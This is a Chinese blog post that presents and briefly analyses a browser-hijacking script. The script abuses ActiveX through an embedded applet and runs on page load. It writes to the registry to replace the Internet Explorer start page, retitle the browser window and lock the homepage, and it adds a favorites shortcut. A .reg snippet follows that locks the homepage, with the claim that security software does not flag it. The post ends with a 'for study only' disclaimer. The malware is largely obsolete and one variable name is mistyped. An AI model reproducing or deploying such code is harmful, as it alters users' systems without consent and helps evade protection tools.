`
icyheart
  • 浏览: 777295 次
  • 性别: Icon_minigender_1
  • 来自: 北京
社区版块
存档分类
最新评论

一段恶意脚本的分析及思考

阅读更多

这段代码主要实现了通过javascript修改注册表中的信息,不过现在所有杀软都已列入了黑名单,代码中的F935DC26-1CF0-11D0-ADB9-00C04FD58A0B 这个字符串在目前的电脑中已经不存在了,但是分析这段代码还有其它的收获,代码如下:

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
//ActiveX 初始化
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
{
//设置Cookie
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//设置Cookie完毕
//设置主页
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://sucre.iteye.com/");
//修改浏览器的标题
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "你的Internet Explorer已经被修改过了 By Sucre");
//锁定浏览器首页
Sh1.RegWrite("HKCR\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\shell\\OpenHomePage\\Command\\@","'\"C:\\Program Files\\Internet Explorer\\IExplore.exe\"' http://sucre.iteye.com");
//设置Cookie
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
AddFavLnk(loc, "我的博客", "http://sucre.iteye.com");
}
}
catch(e)
{}
}
catch(e)
{}
}



function init()
{
setTimeout("f()", 1000);
}
init();
</script>

 其实,用其它脚本也可以实现锁定主页,比如批处理,下面这段代码就锁住了主页,一开IE就会显示指定的页面,这种指向方法所有的防护软件都不会报警,代码如下:

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]

@="\"C:\\Program Files\\Internet Explorer\\IExplore.exe\" http://sucre.iteye.com" 

 以上文字仅供学习交流,不要用于非法操作,否则后果自负!

0
0
分享到:
评论
1 楼 zh89233 2013-11-13  
     

相关推荐

    本科毕业设计_恶意代码检测分类平台.zip

    随着互联网技术的发展,恶意代码的种类和数量持续增长,因此,开发一个高效、准确的恶意代码检测分类平台显得尤为迫切。 平台的设计与实现主要包括以下几个关键知识点: 1. 恶意代码分析:了解恶意代码的基本特征...

    计算机数据安全实验指导书.pdf

    实验思考部分引导学生分析未见实验现象的可能原因、核心代码语言及新的防范方法。 **新欢乐时光病毒实验** 新欢乐时光病毒是基于VBScript的脚本病毒,通过感染脚本文件和Outlook Express的信纸模板传播。实验目的...

    「威胁情报」PPDRR安全模型在业务安全上的新思考_ - 攻防靶场.zip

    1. **预测(Prediction)**:这一阶段涉及对潜在威胁的识别和分析。通过威胁情报,企业可以了解最新的攻击趋势、漏洞信息以及恶意行为者的策略,从而提前做好防范。威胁情报通常包括网络黑市动态、恶意软件样本分析...

    一道shiro反序列化转型引发的思考 .pdf

    《一道Shiro反序列化转型引发的思考》 在网络安全领域,Web安全是至关重要的一环,而Apache Shiro作为一款广泛使用的Java安全框架,其安全问题往往成为黑客攻击的目标。本篇文章聚焦于一起由Shiro反序列化转型引发...

    POC编写指南

    Exp(Exploit,漏洞利用程序)是另一种与漏洞相关的实践,它是指一段代码,可以利用已知的安全漏洞来实现对系统的未经授权的访问或控制。Exp的编写通常比PoC复杂得多,并且需要深入理解漏洞的技术细节以及相关系统的...

    第十节 绕过过滤domain为空的XSS-01

    **XSS(跨站脚本攻击)**是网络安全领域中一种常见的漏洞类型,它允许攻击者在用户的浏览器中注入恶意脚本,进而控制用户的行为或窃取敏感信息。本节主要探讨了如何绕过特定过滤机制,即针对domain为空的情况进行XSS...

    超市会员管理系统数据库实验报告.doc

    《超市会员管理系统数据库实验报告》是对一个以B/S架构为基础,使用JSP脚本语言与Oracle数据库进行交互的超市会员管理系统的设计与实现的详细记录。报告涵盖了系统的需求分析、概要设计、详细设计以及编程实现等多个...

    黑客X档案2011年11月刊

    综上所述,《黑客X档案2011年11月刊》是一期全面解析当时网络安全现状的资源,不仅提供了深入的技术细节,还启发了读者对于网络安全趋势的思考。通过阅读其中的文章,读者能够提升对网络安全的理解,增强自身的防护...

    基于SpringBoot编写的常见Web漏洞安全开发学习平台.zip

    - **XSS(跨站脚本)**:攻击者通过在网页中插入恶意脚本,欺骗用户执行操作。防御策略有输入过滤、输出编码和HTTP头部的Content-Security-Policy设置。 - **CSRF(跨站请求伪造)**:攻击者诱使用户在不知情的...

    java反编译工具(jd-gui)

    5. **分析和编辑**:虽然JD-GUI主要是用于查看,但用户也可以进行简单的文本编辑,如复制代码段,这在编写自定义的转换脚本时可能会用到。 总之,JD-GUI作为一款便捷的Java反编译工具,为开发者提供了洞察字节码...

    JSP企业电子投票系统(源代码+论文+开题报告+文献综述).rar

    5. **毕业设计流程**:该系统作为一个典型的毕业设计项目,包括需求分析、系统设计、编码实现、测试调试、文档编写等多个阶段。每个阶段都需要严谨的思考和实施,以满足实际应用场景的需求。 6. **论文撰写**:在...

    网页特效代码 输入密码后才能进入页面

    根据给定的信息,我们可以分析并总结出一个关于“网页特效代码——输入密码后才能进入页面”的详细知识点。 ### 一、网页密码保护机制概述 在Web开发中,有时需要为某些页面添加密码保护功能,以确保只有特定用户...

    暴雪面试题整理

    SQL注入是一种常见的网络安全威胁,它发生在攻击者通过输入恶意的SQL代码,欺骗数据库系统,获取、修改、删除不应被访问的数据。预防SQL注入的方法包括使用预编译语句(参数化查询)、输入验证、限制数据库权限、...

    Haifei Li Flash安全的过去,现在,和将来

    由于Flash的开放性,恶意黑客可以利用其编程漏洞进行攻击,如零日攻击、跨站脚本攻击(XSS)等,对用户的隐私和系统安全构成严重威胁。 现在:Flash的衰落与替代品的崛起 近年来,随着HTML5、WebGL和WebAssembly等...

    mozilla-otp:Mozilla OTP插件

    TOTP基于时间戳,每隔一段时间(通常是30秒)生成一个新的密码。HOTP则是基于计数器,每次成功验证后,计数器加一,生成新的密码。这两种算法都需要一个共享的秘密密钥,通常在用户设置两步验证时由服务提供商生成并...

    计算机网络课后习题及答案

    - **安全性**:相对于其他操作系统,Linux更难受到病毒和恶意软件的攻击。 - **可定制性**:用户可以根据需求进行高度定制。 - **资源管理**:Linux能够高效管理硬件资源,支持多任务处理。 **3.Linux常见的版本有...

    01-软件测试概述.pdf

    例如,男子趁ATM机出错恶意提款171次被判无期,12306网站上午近乎瘫痪,下午爆“串号门”拼多多无门槛领取100元优惠券等。这些严重的后果警示我们,软件测试的重要性不容忽视。 二、为什么需要软件测试 软件测试的...

Global site tag (gtag.js) - Google Analytics